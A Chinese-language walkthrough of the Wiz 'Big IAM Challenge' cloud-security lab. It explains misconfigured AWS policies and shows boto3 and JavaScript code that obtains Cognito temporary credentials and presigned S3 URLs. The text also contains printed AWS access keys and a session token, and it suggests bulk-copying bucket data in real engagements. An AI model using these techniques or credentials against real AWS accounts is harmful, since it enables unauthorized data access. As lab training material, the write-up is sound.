challenge1
https://bigiamchallenge.com/challenge/1
{"Version": "2012-10-17","Statement": [{"Effect": "Allow","Principal": "*", //*代表所有⽤户即匿名访问"Action": "s3:GetObject", //获取对象权限"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"},{"Effect": "Allow","Principal": "*","Action": "s3:ListBucket", //列出存储桶权限"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b","Condition": {"StringLike": {"s3:prefix": "files/*" //以"files/"为前缀的对象}}}]}
-
允许任何⽤户对指定的S3存储桶执⾏GetObject操作以获取对象的内容。 -
允许任何⽤户对指定的S3存储桶执⾏ListBucket操作列出存储桶中符合指定前缀条件的对象。
Resource字段为资源六段式,具体的含义可以看腾讯云⽂档,其实就是把资源权限划分好,避免同名资源权限冲突。
https://cloud.tencent.com/document/product/598/10606
ok,来玩玩。执⾏了⼀下ls没有权限,再列出存储桶地址就有权限了,这⾥思考⼀下可以发现其实就是上⾯配置⽂件中表达的获取对象权限。
看到⽂件名了,不过这⾥没找到cat指令,看⽂档猜测跟docker⼀样可以cp回来。偷个懒,把cp这个位置换成别的指令就能看对应的⽂档。
可以看到cp可以复制到本地,也可以在存储桶直接进⾏复制。
ok,这⾥下载到有写权限的地⽅即可。
我们不能以做题来做题,来关注⼀下下⾯有两个指令,实战中存储桶中往往有很多⽂件,如何把数据拖到本地呢?这⾥可以看到递归指令,还贴⼼地带上了排除项。
确实可⾏,实战中直接拖到本地打包再下载回来就可以。
尝试了官⽅⽂档⼏个类似https://s3.us-west-2.amazonaws.com/DOC-EXAMPLE-BUCKET1/puppy.jpg的站点,发现⾏不通,我不知道是哪个地区的。
(不过实战中配置⽂件应该是有地区类的信息字样可以关注⼀下)
这⾥索性问了⼀下gpt,可以学到通过 https://s3.amazonaws.com/{桶名}/{uri} 访问也是可以的。
这个靶场shell权限⽐较⼩,aws也⽐较贵,简单地看了⼀下实战中使⽤env判断下aws也许是个可⾏的⽅案,或者看看有没有aws指令。
https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/access_policies_create.html
challenge2
https://bigiamchallenge.com/challenge/2
{"Version": "2012-10-17","Statement": [{"Effect": "Allow","Principal": "*", //允许匿名访问权限"Action": ["sqs:SendMessage","sqs:ReceiveMessage"],"Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analyticssqs-queue-ca7a1b2"}]}
challenge3
https://bigiamchallenge.com/challenge/3
{"Version": "2008-10-17","Id": "Statement1","Statement": [{"Sid": "Statement1","Effect": "Allow","Principal": {"AWS": "*" //允许任何AWS⽤户},"Action": "SNS:Subscribe","Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications","Condition": {"StringLike": {"sns:Endpoint": "*@tbic.wiz.io" //订阅者的Endpoint必须以"*@tbic.wiz.io"结尾}}}]}
https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/reference_policies_elements_principal.html
https://docs.aws.amazon.com/cli/latest/reference/sns/subscribe.html。
可以看到是⼀个类似订阅消息的东⻄。
challenge4
https://bigiamchallenge.com/challenge/4
{"Version": "2012-10-17","Statement": [{"Effect": "Allow","Principal": "*","Action": "s3:GetObject","Resource": "arn:aws:s3:::thebigiamchallenge-admin-storageabf1321/*"},{"Effect": "Allow","Principal": "*","Action": "s3:ListBucket","Resource": "arn:aws:s3:::thebigiamchallenge-admin-storageabf1321","Condition": {"StringLike": {"s3:prefix": "files/*"},"ForAllValues:StringLike": {"aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"}}}]}
"aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
https://mp.weixin.qq.com/s/Yemzqd-TEfzjrCIyS0I_2A
增加 --no-sign-request 参数使得不使⽤凭证访问,即匿名访问。
challenge5
https://bigiamchallenge.com/challenge/5
{"Version": "2012-10-17","Statement": [{"Sid": "VisualEditor0","Effect": "Allow","Action": ["mobileanalytics:PutEvents","cognito-sync:*"],"Resource": "*"},{"Sid": "VisualEditor1","Effect": "Allow","Action": ["s3:GetObject","s3:ListBucket"],"Resource": ["arn:aws:s3:::wiz-privatefiles","arn:aws:s3:::wiz-privatefiles/*"]}]}
ok,完全不懂了,直接看别⼈的题解,发现这⾥提示我们去学⼀下AWS Cognito的错误配置。https://www.wangan.com/p/7fy7f8abba5c0234
看了⼀下公司⾥关于AWS ECR Public漏洞的资料,可以学到这⾥需要的基础知识:
AWS.config.region = 'us-east-1';AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId:"us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});// Set the regionAWS.config.update({region: 'us-east-1'});var s3 = new AWS.S3();var params = {Bucket: 'wiz-privatefiles',Key: 'flag1.txt',Expires: 60 * 60}s3.getSignedUrl('getObject', params, function(err, signedUrl) {console.log('signedUrl:');console.log(signedUrl);});
import boto3# Set the regionregion = 'us-east-1'identity_pool_id = 'us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b'bucket = 'wiz-privatefiles'def run():session = boto3.Session(region_name=region)# 通过identity_pool_id发送给GetId接⼝获取IdentityId#https://docs.aws.amazon.com/zh_cn/cognitoidentity/latest/APIReference/API_GetId.htmlcognito_identity_credentials = session.client('cognito-identity',region_name=region).get_id(IdentityPoolId=identity_pool_id)cognito_id = cognito_identity_credentials['IdentityId']# 再使⽤IdentityId发送到GetCredentialsForIdentity接⼝获取临时凭证#https://docs.aws.amazon.com/zh_cn/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.htmlcredentials = session.client('cognito-identity',region_name=region).get_credentials_for_identity(IdentityId=cognito_id)access_key = credentials['Credentials']['AccessKeyId']secret_key = credentials['Credentials']['SecretKey']session_token = credentials['Credentials']['SessionToken']s3 = session.client('s3', region_name=region, aws_access_key_id=access_key,aws_secret_access_key=secret_key,aws_session_token=session_token)# 获取给定操作名称的预签名URLparams = {'Bucket': bucket,# 'Key': 'flag1.txt'}#https://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/S3.html#getSignedUrlpropertysigned_url = s3.generate_presigned_url('list_objects', Params=params,ExpiresIn=60 * 60)# signed_url = s3.generate_presigned_url('get_object', Params=params,ExpiresIn=60 * 60)print('signedUrl:')print(signed_url)if __name__ == '__main__':run()
challenge6
https://bigiamchallenge.com/challenge/6
{"Version": "2012-10-17","Statement": [{"Effect": "Allow","Principal": {"Federated": "cognito-identity.amazonaws.com"},"Action": "sts:AssumeRoleWithWebIdentity", //使⽤web token扮演⻆⾊,sts:AssumeRole是使⽤凭证"Condition": {"StringEquals": {"cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"}}}]}
https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/id_roles_use.html
这⾥其实获取web token的流程跟挑战5中python3脚本前⾯的流程差不多,先通过
identity_pool_id发送给GetId接⼝获取IdentityId,然后因为是IAM配置中是
sts:AssumeRoleWithWebIdentity ,所以要通过GetOpenIdToken接⼝⽤IdentityId换取webtoken。
aws configure set aws_access_key_id "ASIARK7LBOHXD6CVJB7S"aws configure set aws_secret_access_key"VcukxfOYpXNrFyVZ/4rvj8cyhH6xlNo7xnYkxk37"aws configure set aws_session_token"FwoGZXIvYXdzEPj//////////wEaDAScGTISaHdxPCrJ0yKcApg/+diN0QJMp9jSVd0LAKsPlIc6HVoslp3ZSgxjv0QuIBHNU3gRONYu0tpBOOz92Tmgbzy8mGU7CnEVLaH+U+3wvTybZF4XI4a0lmFht+Q91MYsiRSI5gZXZNK56SE0Agyj9yLGFEX+NKgPAd+m2VEBJ7Z7N9bqrNo5q6PVeBe7AzoPaatyxYWT7Ly4pCyaukH4TxJQirXt/HqIeRXMrqh5k4/WemEOIBWpumlnAgGPQhsPltcYm+E9sujWS7hQd/zDSwSQT4czFfSk0nHzmSJdAqL7pUuzh7VFxJ1Gd2Pvrg41Knx3sGjmAeL0jOIGIXJU8NqsxZ7AK0Dvhe5V8W/Ya/w8h3IA1vXv30LacysbgtBIKIqqg51z5+OOKJjIoKUGMpYBhqHvFrzCD6+fJJBiH85Dad+TRs8zXlzlWbmppqEKrO6LLwQ2/1DnqY+K2amWz+QMTIi6GqvLr64J+oXOE4Ce6C8JF9Dx6HS/Eq9lTTGOxyV13z+OWH6Xpis9+BhMHVKetnX7w7Mvg6NiNN3ggrw9b/CKYOPZ1pvNYUs7u6ZEs+UVfpjl5Z0P6VQBtIGHC6V2ItpGCj1F"
★
原文始发于微信公众号(渗透安全团队):云安全 | AWS challenge挑战靶场
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论